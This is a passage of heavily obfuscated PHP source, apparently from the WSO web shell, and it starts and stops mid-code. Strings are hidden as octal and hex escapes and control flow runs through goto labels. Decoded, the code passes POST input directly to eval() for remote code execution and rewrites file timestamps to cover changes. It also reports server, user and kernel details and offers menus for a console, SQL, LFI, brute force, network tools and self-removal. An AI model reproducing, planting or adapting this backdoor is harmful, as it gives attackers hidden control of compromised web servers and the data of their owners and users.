"\x3c\146\157\x72\155\40\157\156\163\x75\142\x6d\x69\164\75\x22\147\50\156\x75\154\154\54\156\165\154\154\x2c\x6e\x75\x6c\154\x2c\x6e\165\154\154\x2c\x74\x68\151\163\56\156\141\x6d\145\x2e\x76\141\154\x75\145\x29\x3b\x72\x65\164\x75\x72\x6e\x20\x66\141\154\x73\145\x3b\x22\76\x3c\x69\156\160\x75\164\x20\164\x79\x70\145\x3d\x74\145\170\x74\40\x6e\141\x6d\145\75\x6e\x61\x6d\145\40\166\141\154\165\145\x3d\x22" . htmlspecialchars($_POST["\160\61"]) . "\42\x3e\x3c\151\156\160\x75\x74\40\164\171\160\145\75\163\x75\142\x6d\151\x74\40\166\x61\154\165\145\75\42\76\76\x22\76\x3c\57\146\x6f\162\x6d\x3e"; break; case "\164\x6f\165\143\150": if (!empty($_POST["\160\x33"])) { $time = strtotime($_POST["\x70\63"]); if ($time) { if (!touch($_POST["\160\61"], $time, $time)) { echo "\106\141\x69\154\41"; } else { echo "\124\x6f\x75\143\x68\x65\144\41"; } } else { echo "\102\141\144\40\x74\151\155\145\x20\146\157\162\155\141\x74\41"; } } clearstatcache(); echo "\x3c\163\x63\x72\151\160\164\x3e\160\x33\x5f\75\42\x22\73\74\57\163\x63\x72\151\x70\x74\76\74\x66\157\x72\x6d\40\157\x6e\163\165\x62\x6d\151\x74\75\x22\x67\50\156\x75\154\x6c\54\156\165\x6c\x6c\x2c\x6e\x75\x6c\154\54\x6e\x75\x6c\154\x2c\x74\x68\151\x73\x2e\164\x6f\165\143\150\x2e\166\141\154\165\x65\51\73\162\x65\x74\x75\x72\156\x20\x66\141\x6c\x73\145\73\x22\x3e\x3c\151\x6e\x70\x75\164\40\164\x79\x70\x65\75\164\145\x78\164\40\x6e\x61\x6d\x65\x3d\x74\x6f\165\143\150\40\x76\141\154\x75\145\x3d\42" . date("\x59\x2d\x6d\x2d\x64\40\x48\x3a\x69\x3a\163", @filemtime($_POST["\160\61"])) . "\x22\76\x3c\151\156\x70\165\x74\x20\164\171\x70\x65\75\x73\x75\x62\155\x69\x74\x20\166\x61\x6c\165\x65\75\42\x3e\x3e\x22\76\74\57\x66\157\162\x6d\76"; break; } echo "\x3c\57\x64\x69\166\76"; wsoFooter(); } goto IHC8D; AjLS7: if (!function_exists("\160\x6f\163\151\170\x5f\x67\x65\164\160\x77\x75\x69\x64") && strpos($GLOBALS["\x64\151\x73\141\x62\x6c\145\137\146\165\x6e\143\x74\x69\157\x6e\163"], "\160\157\x73\151\170\x5f\x67\145\164\160\x77\165\151\x64") === false) { function posix_getpwuid($p) { return false; } } goto SKJBT; PQ7mg: $color = "\43\x30\60\x66\x66\60\x30"; goto YDIdN; Keq0A: function actionPhp() { if (isset($_POST["\141\152\x61\170"])) { $_SESSION[md5($_SERVER["\110\x54\124\x50\x5f\x48\x4f\123\124"]) . "\x61\152\141\170"] = true; ob_start(); eval($_POST["\x70\61"]); $temp = "\x64\157\x63\x75\x6d\x65\x6e\x74\x2e\x67\x65\164\x45\154\x65\x6d\x65\x6e\x74\102\171\111\144\50\47\x50\x68\160\x4f\x75\x74\160\x75\164\47\x29\x2e\163\x74\171\154\x65\x2e\x64\151\163\160\x6c\141\171\75\47\x27\x3b\x64\x6f\x63\165\155\145\x6e\x74\56\x67\145\164\105\x6c\145\155\x65\x6e\x74\102\x79\x49\144\x28\47\x50\150\x70\117\x75\164\x70\165\x74\47\51\56\151\156\x6e\145\x72\x48\x54\115\x4c\x3d\x27" . addcslashes(htmlspecialchars(ob_get_clean()), "\12\xd\x9\134\x27\0") . "\x27\73\12"; echo strlen($temp), "\12", $temp; die; } wsoHeader(); if (isset($_POST["\160\x32"]) && $_POST["\x70\62"] == "\x69\156\146\157") { echo "\74\x68\x31\76\120\x48\x50\x20\151\156\146\157\x3c\x2f\150\61\x3e\74\144\151\166\40\143\154\141\x73\x73\x3d\143\157\x6e\164\x65\156\164\76\74\x73\164\x79\154\145\76\x2e\160\40\x7b\143\157\154\x6f\x72\x3a\43\x30\x30\x30\x3b\x7d\x3c\x2f\x73\x74\x79\154\145\x3e"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("\41\50\142\157\144\171\174\141\x3a\x5c\167\53\x7c\x62\157\144\171\54\40\x74\x64\54\x20\x74\x68\54\40\x68\x31\54\x20\150\x32\51\x20\x7b\x2e\52\175\41\x6d\163\151\125", '', $tmp); $tmp = preg_replace("\x21\x74\144\54\x20\164\150\x20\173\50\x2e\x2a\x29\x7d\x21\155\163\x69\x55", "\x2e\145\x2c\x20\x2e\166\54\x20\56\x68\54\x20\x2e\150\40\164\x68\x20\x7b\x24\x31\175", $tmp); echo str_replace("\74\150\61", "\74\x68\62", $tmp) . "\x3c\57\144\x69\166\76\x3c\142\162\76"; } if (empty($_POST["\141\x6a\141\170"]) && !empty($_POST["\160\61"])) { $_SESSION[md5($_SERVER["\110\x54\124\120\x5f\110\x4f\123\x54"]) . "\x61\152\141\170"] = false; } echo "\74\150\61\x3e\x45\170\x65\143\165\164\x69\157\156\40\x50\x48\120\55\x63\x6f\144\145\74\57\x68\x31\x3e\x3c\144\x69\166\40\x63\154\141\x73\163\x3d\143\x6f\156\164\145\156\x74\x3e\x3c\146\x6f\162\x6d\40\156\x61\x6d\x65\x3d\160\x66\40\x6d\145\x74\x68\x6f\144\75\160\x6f\163\164\x20\157\156\163\165\x62\155\151\x74\x3d\42\151\x66\50\x74\150\151\x73\x2e\141\x6a\141\x78\x2e\x63\x68\x65\x63\x6b\x65\144\51\173\141\50\x27\120\150\x70\47\54\x6e\x75\154\154\54\x74\150\151\163\56\143\x6f\144\x65\56\166\141\x6c\x75\145\x29\73\175\x65\x6c\x73\x65\x7b\147\x28\x27\x50\150\160\47\x2c\x6e\165\x6c\154\54\x74\150\151\163\x2e\x63\157\144\145\56\166\141\x6c\165\x65\54\x27\47\51\x3b\x7d\162\x65\x74\x75\162\156\40\x66\x61\154\x73\145\73\42\76\74\x74\x65\x78\164\x61\x72\145\141\40\156\141\155\145\75\x63\x6f\x64\145\x20\x63\x6c\x61\163\x73\x3d\x62\151\147\x61\162\x65\x61\x20\151\144\75\x50\150\x70\103\157\144\145\76" . (!empty($_POST["\160\61"]) ? htmlspecialchars($_POST["\160\x31"]) : '') . "\74\57\x74\x65\x78\x74\x61\162\145\141\76\x3c\x69\156\160\x75\164\40\x74\171\x70\x65\x3d\163\165\x62\x6d\151\164\x20\x76\x61\x6c\x75\x65\x3d\105\x76\141\x6c\x20\x73\x74\171\154\x65\x3d\42\x6d\141\162\147\151\x6e\55\164\157\x70\x3a\x35\160\170\42\x3e"; echo "\x20\x3c\151\156\160\x75\x74\40\x74\x79\x70\145\75\143\x68\145\143\153\x62\157\170\40\x6e\x61\155\145\x3d\141\152\x61\x78\x20\x76\x61\154\x75\x65\x3d\61\x20" . ($_SESSION[md5($_SERVER["\110\124\x54\x50\x5f\x48\117\x53\124"]) . "\141\152\x61\x78"] ? "\x63\x68\145\x63\x6b\145\x64" : '') . "\76\40\163\145\156\144\x20\165\x73\x69\156\x67\x20\101\x4a\x41\130\x3c\57\x66\157\x72\155\76\x3c\x70\x72\x65\40\151\144\x3d\x50\x68\160\117\x75\x74\x70\165\164\x20\163\x74\x79\x6c\x65\75\42" . (empty($_POST["\x70\x31"]) ? "\x64\151\x73\x70\154\141\171\72\x6e\157\156\145\73" : '') . "\155\x61\x72\147\151\x6e\x2d\164\157\160\x3a\65\x70\x78\73\42\40\x63\154\141\x73\163\x3d\x6d\154\x31\76"; if (!empty($_POST["\160\x31"])) { ob_start(); eval($_POST["\x70\x31"]); echo htmlspecialchars(ob_get_clean()); } echo "\74\57\160\162\145\x3e\74\x2f\x64\x69\x76\76"; wsoFooter(); } goto Q9S2h; ACsbt: $default_use_ajax = true; goto EB2md; uKoLR: $datasi = @fopen("\152\x73\x2f\x6a\163\x2e\160\x68\160", "\x72"); goto WSK9t; C7Al9: function FetchURL($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, "{$cheader}"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $data = curl_exec($ch); if (!$data) { return false; } return $data; } goto FexA0; QwM1y: $home_cwd = @getcwd(); goto h3SJs; FexA0: die; goto X2GR2; kwWV5: function wsoHeader() { if (empty($_POST["\x63\150\141\162\163\145\x74"])) { $_POST["\x63\x68\141\x72\163\x65\x74"] = $GLOBALS["\x64\145\146\x61\165\154\164\x5f\x63\150\x61\x72\163\145\x74"]; } global $color; echo "\x3c\x68\x74\x6d\154\76\74\x68\145\x61\x64\76\x3c\155\145\164\x61\40\x68\x74\x74\x70\x2d\x65\x71\x75\151\166\x3d\47\x43\157\x6e\164\x65\156\x74\55\124\171\x70\145\47\x20\143\157\x6e\164\145\156\164\x3d\x27\164\x65\170\x74\x2f\150\164\155\154\73\40\143\x68\x61\x72\x73\x65\x74\x3d" . $_POST["\x63\150\x61\x72\163\145\164"] . "\47\76\x3c\x74\x69\164\x6c\x65\76" . $_SERVER["\110\124\124\x50\x5f\110\117\123\124"] . "\x20\55\x20\x57\123\117\x20" . WSO_VERSION . "\x3c\x2f\164\x69\x74\x6c\x65\x3e\xa\74\163\164\x79\x6c\145\x3e\xa\x62\x6f\x64\x79\40\x7b\x62\141\143\x6b\147\162\x6f\x75\x6e\x64\x2d\143\157\x6c\x6f\x72\72\x23\x30\60\x30\73\x63\x6f\154\157\x72\72\x23\146\x66\x66\73\x7d\x20\40\xa\x62\x6f\144\x79\x2c\164\x64\x2c\x74\150\173\x20\146\157\156\164\x3a\x20\71\x70\x74\40\114\165\143\x69\144\x61\x2c\126\x65\162\x64\141\x6e\x61\x3b\x6d\x61\x72\147\151\156\x3a\60\x3b\166\145\162\x74\x69\x63\141\x6c\55\x61\154\151\x67\x6e\72\164\x6f\x70\73\x20\175\x20\x20\xa\163\x70\x61\x6e\x2c\150\61\x2c\x61\173\x20\143\157\154\x6f\x72\x3a\x20{$color}\x20\x21\151\x6d\160\157\162\x74\x61\x6e\x74\x3b\40\175\40\40\12\x73\160\x61\156\x7b\40\146\x6f\156\x74\x2d\167\x65\x69\x67\x68\164\72\x20\x62\157\154\144\x65\162\73\40\175\x20\x20\12\x68\61\x7b\40\142\157\x72\144\145\162\x3a\x31\x70\x78\x20\163\157\154\151\x64\x20{$color}\x3b\x70\141\144\144\x69\x6e\147\72\40\x32\160\170\x20\x35\x70\170\73\x66\157\x6e\164\x3a\x20\x31\64\160\164\40\126\145\162\x64\141\156\141\x3b\155\141\162\147\151\156\x3a\x30\x70\170\x3b\40\175\x20\x20\12\x64\x69\166\56\x63\157\x6e\164\x65\x6e\164\x7b\40\x70\141\144\144\151\x6e\147\72\40\65\x70\170\73\x6d\x61\162\x67\x69\x6e\x2d\x6c\145\x66\x74\72\x35\160\170\x3b\175\40\x20\12\141\x7b\x20\x74\145\170\164\x2d\x64\145\x63\157\162\x61\164\151\157\156\x3a\156\157\156\145\x3b\40\175\x20\x20\xa\141\x3a\150\157\166\x65\162\x7b\x20\142\x61\x63\153\147\x72\157\x75\x6e\x64\72\x23\146\146\60\60\x30\x30\73\x20\175\40\x20\xa\x2e\x6d\154\61\173\40\x62\157\162\144\145\x72\x3a\x31\x70\x78\40\163\x6f\x6c\151\144\x20\43\x34\64\64\x3b\160\141\144\x64\x69\x6e\147\72\65\x70\170\73\155\141\162\147\151\x6e\x3a\x30\x3b\157\x76\145\162\x66\154\157\167\72\40\x61\165\164\157\x3b\x20\175\40\40\12\x2e\142\151\x67\x61\162\145\x61\x7b\x20\167\x69\x64\x74\150\72\61\60\60\45\x3b\x68\145\151\147\x68\x74\72\x32\x35\60\x70\170\x3b\x20\175\40\40\xa\151\156\x70\x75\164\54\x20\164\145\170\164\x61\162\145\141\x2c\x20\163\145\154\145\143\164\173\40\155\141\162\x67\151\x6e\x3a\x30\x3b\143\157\x6c\157\x72\72\43\60\x30\146\x66\60\60\x3b\142\x61\143\153\x67\x72\x6f\165\156\x64\x2d\143\x6f\154\157\162\x3a\43\x30\x30\x30\x3b\142\x6f\x72\144\x65\x72\72\x31\x70\170\x20\x73\157\154\x69\144\x20{$color}\73\x20\146\157\156\164\x3a\x20\71\160\164\40\115\x6f\156\157\163\160\141\143\x65\x2c\x27\x43\x6f\x75\162\151\x65\x72\x20\116\x65\167\x27\x3b\x20\x7d\40\40\xa\x66\x6f\x72\155\173\x20\x6d\x61\x72\147\x69\156\72\x30\x70\170\x3b\x20\175\40\x20\xa\x23\x74\157\157\x6c\163\124\x62\x6c\x7b\x20\164\145\170\x74\x2d\141\x6c\x69\x67\156\72\x63\145\156\x74\x65\x72\73\40\x7d\40\x20\12\x2e\164\x6f\x6f\x6c\163\111\x6e\160\173\40\x77\151\x64\164\x68\72\40\x38\60\x25\x3b\40\x7d\40\40\xa\x2e\155\x61\151\156\x20\164\150\173\164\145\x78\x74\x2d\x61\154\151\x67\156\72\154\x65\146\x74\x3b\175\40\x20\12\56\155\141\x69\156\x20\164\162\72\150\x6f\x76\x65\162\173\142\x61\x63\153\147\x72\x6f\x75\x6e\x64\55\x63\x6f\x6c\157\162\72\x23\65\x65\x35\145\65\x65\73\x7d\x20\40\xa\56\x6d\141\x69\x6e\40\164\x64\54\40\164\x68\x7b\x76\145\x72\x74\151\x63\141\154\x2d\x61\154\151\x67\x6e\x3a\x6d\x69\144\x64\x6c\x65\73\x7d\x20\40\12\160\x72\x65\x7b\146\x6f\156\164\x2d\146\141\155\151\154\x79\72\x43\x6f\165\x72\x69\145\162\54\x4d\x6f\156\157\x73\160\141\x63\x65\x3b\175\xa\x23\143\157\164\137\x74\154\137\x66\x69\170\145\144\173\x70\157\x73\151\x74\x69\x6f\156\x3a\x66\x69\x78\x65\144\73\142\x6f\164\164\157\155\x3a\60\160\x78\73\x66\157\x6e\164\x2d\163\x69\x7a\x65\x3a\x31\x32\160\x78\73\154\x65\146\164\x3a\60\160\x78\73\160\141\144\144\x69\156\147\x3a\64\x70\170\40\x30\x3b\x63\154\151\160\x3a\x5f\x74\x6f\160\x3a\145\170\160\162\x65\x73\163\x69\x6f\x6e\50\144\157\x63\165\x6d\x65\156\x74\x2e\144\157\143\165\155\145\x6e\x74\x45\x6c\x65\x6d\x65\x6e\x74\56\163\x63\x72\157\154\x6c\x54\x6f\160\x2b\144\x6f\143\x75\155\145\156\x74\x2e\x64\x6f\x63\165\x6d\x65\x6e\x74\x45\x6c\145\x6d\145\156\164\56\x63\154\151\145\x6e\x74\110\x65\151\x67\150\x74\55\x74\x68\151\163\x2e\x63\x6c\x69\x65\x6e\164\x48\x65\x69\147\150\164\x29\x3b\x5f\x6c\x65\146\x74\72\145\170\x70\x72\145\x73\163\151\x6f\156\50\144\157\143\x75\x6d\145\156\x74\56\x64\157\143\x75\x6d\x65\x6e\x74\105\154\145\155\x65\156\x74\x2e\163\x63\162\157\x6c\154\114\145\146\164\40\53\40\144\157\143\165\155\145\156\164\x2e\144\x6f\143\165\155\145\156\164\105\154\145\155\x65\156\x74\56\143\154\x69\145\156\164\x57\x69\x64\164\150\40\55\40\157\146\x66\163\145\164\127\x69\x64\164\x68\x29\x3b\175\40\x20\xa\x3c\x2f\163\x74\171\154\145\x3e\12\x3c\x73\x63\x72\x69\x70\x74\76\xa\40\x20\x20\x20\166\x61\162\x20\x63\x5f\x20\75\40\47" . htmlspecialchars($GLOBALS["\x63\x77\x64"]) . "\x27\x3b\xa\40\x20\40\40\166\141\162\x20\x61\137\x20\75\40\47" . htmlspecialchars(@$_POST["\141"]) . "\47\12\x20\40\x20\x20\166\x61\x72\x20\x63\x68\141\162\x73\145\164\137\x20\x3d\40\x27" . htmlspecialchars(@$_POST["\143\x68\x61\x72\x73\145\x74"]) . "\47\73\xa\x20\40\40\40\x76\141\x72\x20\x70\x31\x5f\40\75\40\x27" . (strpos(@$_POST["\160\61"], "\xa") !== false ? '' : htmlspecialchars($_POST["\x70\61"], ENT_QUOTES)) . "\47\x3b\xa\40\x20\x20\x20\x76\141\x72\40\x70\62\x5f\x20\75\40\47" . (strpos(@$_POST["\x70\x32"], "\12") !== false ? '' : htmlspecialchars($_POST["\160\x32"], ENT_QUOTES)) . "\x27\73\12\x20\40\40\x20\x76\141\162\x20\160\x33\x5f\x20\75\40\47" . (strpos(@$_POST["\x70\x33"], "\xa") !== false ? '' : htmlspecialchars($_POST["\x70\63"], ENT_QUOTES)) . "\x27\73\xa\40\40\40\x20\x76\x61\x72\40\x64\40\75\40\144\x6f\143\165\155\x65\156\x74\73\xa\40\x20\x20\x20\x66\165\156\143\x74\151\x6f\156\40\x73\145\164\50\141\54\x63\x2c\160\x31\54\160\x32\x2c\x70\x33\54\x63\150\141\x72\163\x65\164\x29\40\173\xa\x20\40\40\40\x20\40\x20\40\x69\x66\50\x61\x21\75\156\165\154\154\x29\x64\56\155\x66\x2e\x61\x2e\x76\x61\154\x75\145\x3d\x61\x3b\x65\154\163\145\x20\144\x2e\155\x66\x2e\141\56\166\141\x6c\165\x65\75\141\x5f\x3b\xa\40\x20\40\40\x20\x20\40\40\151\x66\x28\x63\41\75\156\x75\x6c\154\x29\x64\56\x6d\x66\x2e\x63\56\166\x61\154\165\x65\x3d\143\73\145\x6c\163\145\40\x64\56\x6d\x66\56\143\56\x76\141\x6c\x75\145\75\143\x5f\73\12\40\40\x20\x20\x20\40\x20\x20\151\146\x28\x70\61\41\75\x6e\x75\x6c\x6c\x29\x64\56\155\146\x2e\x70\x31\x2e\x76\141\x6c\165\x65\x3d\x70\x31\73\x65\x6c\x73\145\x20\144\x2e\155\146\56\160\x31\x2e\x76\x61\154\165\145\75\x70\61\137\x3b\12\x20\40\x20\x20\40\x20\x20\40\151\x66\x28\160\62\x21\x3d\156\x75\154\x6c\51\x64\56\155\146\x2e\x70\x32\56\x76\141\x6c\x75\x65\x3d\160\x32\73\x65\x6c\163\x65\x20\144\56\155\146\56\160\62\56\x76\x61\154\x75\145\75\x70\62\137\x3b\xa\x20\x20\x20\x20\x20\x20\40\x20\x69\146\50\160\x33\41\x3d\156\x75\x6c\x6c\x29\x64\56\x6d\x66\x2e\x70\x33\56\166\141\154\165\145\75\160\63\73\x65\x6c\163\145\x20\x64\x2e\155\x66\x2e\160\63\56\166\141\154\x75\x65\x3d\x70\63\137\73\xa\x20\x20\x20\40\x20\x20\x20\x20\x69\146\x28\x63\x68\x61\x72\x73\145\164\41\x3d\x6e\165\x6c\154\x29\144\56\x6d\x66\x2e\x63\150\x61\x72\x73\x65\164\x2e\x76\141\x6c\165\x65\x3d\143\x68\141\x72\163\145\164\x3b\x65\x6c\x73\145\40\x64\56\x6d\146\x2e\143\x68\x61\162\x73\145\x74\x2e\166\141\x6c\165\145\x3d\143\150\141\162\163\145\x74\x5f\x3b\12\x20\x20\x20\x20\x7d\12\x20\40\40\x20\146\x75\x6e\x63\164\x69\157\x6e\40\147\50\141\54\143\x2c\160\61\x2c\160\x32\54\x70\63\54\x63\150\141\x72\163\145\x74\51\x20\173\12\x20\40\40\x20\40\x20\x20\40\163\x65\164\x28\141\x2c\x63\54\160\x31\x2c\160\62\54\160\x33\x2c\x63\150\141\x72\x73\x65\164\x29\x3b\xa\40\x20\40\40\40\40\40\40\144\x2e\155\x66\56\x73\165\x62\x6d\151\x74\50\51\73\xa\x20\40\40\40\x7d\xa\40\x20\x20\40\146\x75\x6e\143\x74\151\157\x6e\x20\141\50\x61\x2c\x63\54\x70\61\x2c\160\62\x2c\x70\x33\x2c\x63\x68\141\x72\x73\145\x74\x29\x20\x7b\12\x20\x20\x20\x20\40\40\40\40\x73\145\164\x28\141\54\143\54\160\61\54\x70\62\54\x70\x33\x2c\143\150\141\162\163\x65\164\51\73\12\x20\40\40\40\x20\40\x20\x20\x76\141\x72\40\x70\x61\x72\x61\155\163\x20\75\x20\x27\x61\152\x61\x78\x3d\x74\x72\165\x65\47\73\xa\x20\x20\40\x20\x20\40\40\x20\146\157\162\50\x69\x3d\60\73\151\x3c\x64\56\155\146\x2e\145\154\x65\155\145\156\x74\163\56\x6c\145\156\x67\164\x68\73\151\53\x2b\x29\xa\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\x70\141\162\x61\155\163\x20\53\75\40\x27\46\x27\x2b\144\56\155\146\56\145\x6c\145\x6d\x65\156\x74\163\x5b\151\135\56\x6e\x61\155\145\53\x27\75\x27\x2b\x65\x6e\143\x6f\144\x65\125\x52\111\103\x6f\155\x70\x6f\156\145\156\164\x28\x64\x2e\x6d\x66\x2e\x65\154\x65\155\x65\x6e\164\163\x5b\x69\135\56\166\141\154\165\x65\51\x3b\12\x20\40\40\x20\x20\x20\40\40\163\162\50\x27" . addslashes($_SERVER["\122\105\x51\125\x45\x53\124\x5f\x55\122\111"]) . "\x27\x2c\x20\160\141\162\x61\155\x73\51\x3b\12\x20\40\x20\40\175\xa\40\40\x20\x20\146\165\x6e\x63\164\x69\157\156\x20\x73\x72\50\x75\x72\154\54\40\x70\141\162\141\x6d\x73\51\x20\173\12\x20\40\40\40\40\40\40\x20\x69\x66\40\x28\167\x69\x6e\144\x6f\x77\56\130\115\x4c\x48\164\164\160\x52\x65\161\165\x65\163\164\x29\xa\40\x20\40\x20\40\x20\40\40\x20\x20\40\x20\162\145\x71\40\75\40\x6e\145\x77\40\x58\x4d\114\110\164\164\160\x52\x65\161\165\x65\x73\x74\x28\51\73\12\x20\40\40\x20\x20\40\40\x20\x65\x6c\163\145\40\x69\x66\x20\50\167\151\156\144\x6f\167\x2e\x41\x63\x74\151\x76\x65\x58\117\x62\152\145\143\164\x29\12\40\x20\40\40\x20\x20\40\x20\40\40\40\40\162\x65\161\x20\x3d\x20\x6e\145\x77\40\x41\143\x74\151\x76\145\x58\x4f\x62\152\x65\x63\x74\x28\47\x4d\151\143\x72\157\163\157\146\x74\56\130\x4d\114\x48\124\124\120\x27\51\x3b\xa\x20\x20\x20\40\x20\40\40\x20\x69\x66\x20\x28\162\145\x71\51\40\x7b\xa\x20\40\x20\x20\40\40\40\x20\x20\40\40\x20\x72\145\x71\x2e\157\x6e\162\x65\141\x64\171\x73\x74\x61\164\145\x63\x68\x61\156\x67\x65\40\75\x20\160\162\x6f\x63\x65\163\x73\122\145\161\103\x68\141\x6e\x67\x65\73\xa\40\x20\40\40\x20\40\40\40\x20\40\x20\40\162\145\161\x2e\x6f\x70\x65\156\x28\x27\x50\x4f\x53\x54\47\x2c\40\x75\x72\154\54\x20\164\162\x75\x65\x29\x3b\12\x20\40\x20\x20\x20\40\40\40\40\40\x20\40\162\145\x71\56\163\145\x74\122\x65\x71\165\145\163\x74\x48\145\141\x64\x65\x72\x20\x28\x27\103\157\x6e\x74\145\x6e\164\55\x54\x79\160\145\x27\x2c\40\x27\141\160\160\x6c\151\x63\141\164\151\x6f\156\x2f\170\55\167\167\x77\x2d\146\x6f\162\155\x2d\x75\x72\154\x65\156\143\x6f\144\x65\x64\x27\51\x3b\12\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\x72\145\161\x2e\163\x65\x6e\144\50\160\x61\x72\141\x6d\163\x29\x3b\12\40\40\40\40\40\x20\40\40\x7d\12\x20\x20\40\40\175\xa\x20\40\x20\x20\146\x75\x6e\143\x74\151\x6f\156\x20\x70\162\157\x63\145\x73\163\122\x65\161\x43\x68\x61\156\147\145\x28\x29\40\173\xa\40\x20\40\40\40\40\x20\40\151\146\x28\40\50\162\145\x71\56\162\145\141\144\171\123\x74\x61\164\x65\x20\x3d\75\40\x34\51\x20\x29\12\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\x69\x66\50\162\x65\161\56\x73\x74\x61\x74\x75\163\40\75\x3d\40\x32\60\x30\x29\x20\173\12\x20\40\x20\40\x20\x20\40\x20\40\40\x20\x20\40\40\40\40\x76\141\x72\x20\x72\145\147\40\x3d\x20\x6e\x65\167\x20\122\x65\147\x45\170\160\50\42\x28\134\134\x64\53\x29\50\133\134\x5c\x53\134\134\x73\x5d\52\x29\x22\54\x20\x27\155\x27\x29\73\xa\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\166\x61\x72\40\141\x72\162\x3d\162\145\147\x2e\x65\x78\145\x63\x28\x72\x65\x71\x2e\162\145\x73\160\157\x6e\x73\x65\124\145\170\x74\51\x3b\xa\x20\40\40\40\x20\x20\40\40\40\x20\x20\40\x20\40\40\40\x65\166\141\x6c\50\x61\x72\162\133\62\135\x2e\163\x75\142\163\164\x72\50\60\x2c\x20\x61\x72\162\x5b\61\135\x29\51\73\12\x20\x20\40\x20\40\x20\x20\x20\40\40\40\x20\175\40\x65\x6c\x73\145\x20\141\154\x65\162\x74\50\x27\x52\x65\x71\165\x65\163\x74\40\x65\x72\162\157\x72\x21\x27\x29\73\12\x20\x20\x20\40\x7d\12\74\57\163\143\162\x69\160\x74\76\xa\x3c\x68\145\x61\x64\76\x3c\142\x6f\144\x79\76\x3c\144\x69\166\40\x73\x74\x79\154\x65\x3d\47\160\x6f\x73\x69\164\x69\x6f\x6e\72\141\142\x73\x6f\x6c\x75\164\145\x3b\x77\151\x64\164\x68\x3a\61\60\60\45\73\142\x61\143\153\x67\162\x6f\x75\156\x64\55\x63\x6f\154\x6f\162\x3a\x23\x30\x30\x30\73\x74\x6f\160\72\x30\73\154\x65\146\x74\72\x30\x3b\x27\x3e\12\74\146\157\162\x6d\40\155\x65\x74\150\157\144\x3d\x70\x6f\x73\164\x20\x6e\x61\155\x65\x3d\155\x66\x20\x73\164\171\154\x65\75\x27\144\151\x73\160\x6c\x61\171\72\156\x6f\156\145\73\47\76\12\74\x69\156\160\x75\164\40\164\x79\x70\x65\x3d\150\151\x64\144\145\156\x20\x6e\x61\155\x65\x3d\141\x3e\12\74\x69\x6e\x70\165\164\40\164\171\160\145\75\x68\151\x64\x64\145\156\40\x6e\x61\155\145\75\143\x3e\12\x3c\x69\156\160\165\164\x20\x74\171\160\145\x3d\x68\151\144\144\145\x6e\40\156\141\x6d\145\x3d\x70\x31\x3e\12\x3c\151\156\160\165\x74\40\164\171\160\145\75\150\x69\144\144\x65\x6e\40\x6e\141\x6d\x65\x3d\160\62\76\xa\x20\xa\74\151\156\x70\165\164\40\164\171\x70\145\x3d\150\151\x64\x64\x65\x6e\x20\x6e\x61\x6d\145\75\160\63\76\xa\74\x69\156\x70\165\x74\x20\164\x79\160\x65\x3d\150\151\144\144\145\156\x20\x6e\141\155\x65\75\x63\150\141\162\x73\x65\x74\76\12\74\x2f\x66\x6f\x72\155\x3e"; $freeSpace = @diskfreespace($GLOBALS["\x63\x77\144"]); $totalSpace = @disk_total_space($GLOBALS["\143\167\144"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("\162"); $kernel = @php_uname("\x73"); if (!function_exists("\160\x6f\163\x69\x78\x5f\147\145\164\145\147\151\x64")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "\77"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["\x6e\x61\155\x65"]; $uid = $uid["\x75\x69\144"]; $group = $gid["\156\x61\x6d\x65"]; $gid = $gid["\x67\x69\144"]; } $cwd_links = ''; $path = explode("\57", $GLOBALS["\143\x77\x64"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "\74\x61\40\x68\x72\145\x66\75\x27\43\x27\x20\x6f\x6e\x63\154\x69\143\x6b\75\47\x67\x28\x22\x46\x69\x6c\x65\163\115\141\x6e\x22\54\x22"; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "\x2f"; } $cwd_links .= "\42\x29\x27\76" . $path[$i] . "\57\x3c\x2f\x61\76"; } $charsets = array("\125\x54\106\x2d\x38", "\127\151\x6e\x64\157\x77\163\x2d\x31\x32\x35\x31", "\x4b\x4f\x49\x38\55\x52", "\113\117\111\70\x2d\x55", "\x63\x70\x38\66\66"); $opt_charsets = ''; foreach ($charsets as $item) { $opt_charsets .= "\74\x6f\160\x74\x69\x6f\x6e\40\x76\141\154\x75\145\75\x22" . $item . "\42\x20" . ($_POST["\143\x68\x61\x72\163\145\164"] == $item ? "\163\x65\154\145\x63\x74\145\x64" : '') . "\76" . $item . "\x3c\x2f\x6f\160\x74\151\157\x6e\76"; } $m = array("\123\145\143\40\111\156\146\157" => "\x53\145\x63\x49\x6e\x66\x6f", "\106\x69\154\145\163" => "\106\x69\x6c\x65\x73\115\141\156", "\x45\x78\x65\x63" => "\103\157\156\x73\157\x6c\x65", "\123\x71\154" => "\123\x71\x6c", "\x50\x48\120\40\x54\x6f\157\154\x73" => "\160\150\160\164\157\157\154\x73", "\x4c\x46\111" => "\154\146\151\163\143\x61\x6e", "\120\x68\160" => "\120\x68\x70", "\x53\141\146\145\40\x6d\157\x64\x65" => "\x53\x61\x66\x65\x4d\x6f\x64\x65", "\x53\164\162\x69\156\x67\40\164\157\x6f\154\x73" => "\123\x74\x72\x69\x6e\147\124\x6f\157\154\163", "\x58\x53\123\40\123\150\145\x6c\x6c" => "\130\x53\x53\123\x68\145\x6c\154", "\x42\162\165\x74\x65\146\x6f\x72\143\145" => "\x42\x72\x75\164\x65\146\157\x72\x63\145", "\116\145\164\167\157\162\153" => "\116\x65\x74\167\157\162\153"); if (!empty($GLOBALS["\141\x75\x74\150\x5f\x70\x61\163\x73"])) { $m["\114\x6f\x67\x6f\x75\x74"] = "\114\157\147\x6f\165\x74"; } $m["\x53\145\154\x66\40\x72\145\x6d\157\166\145"] = 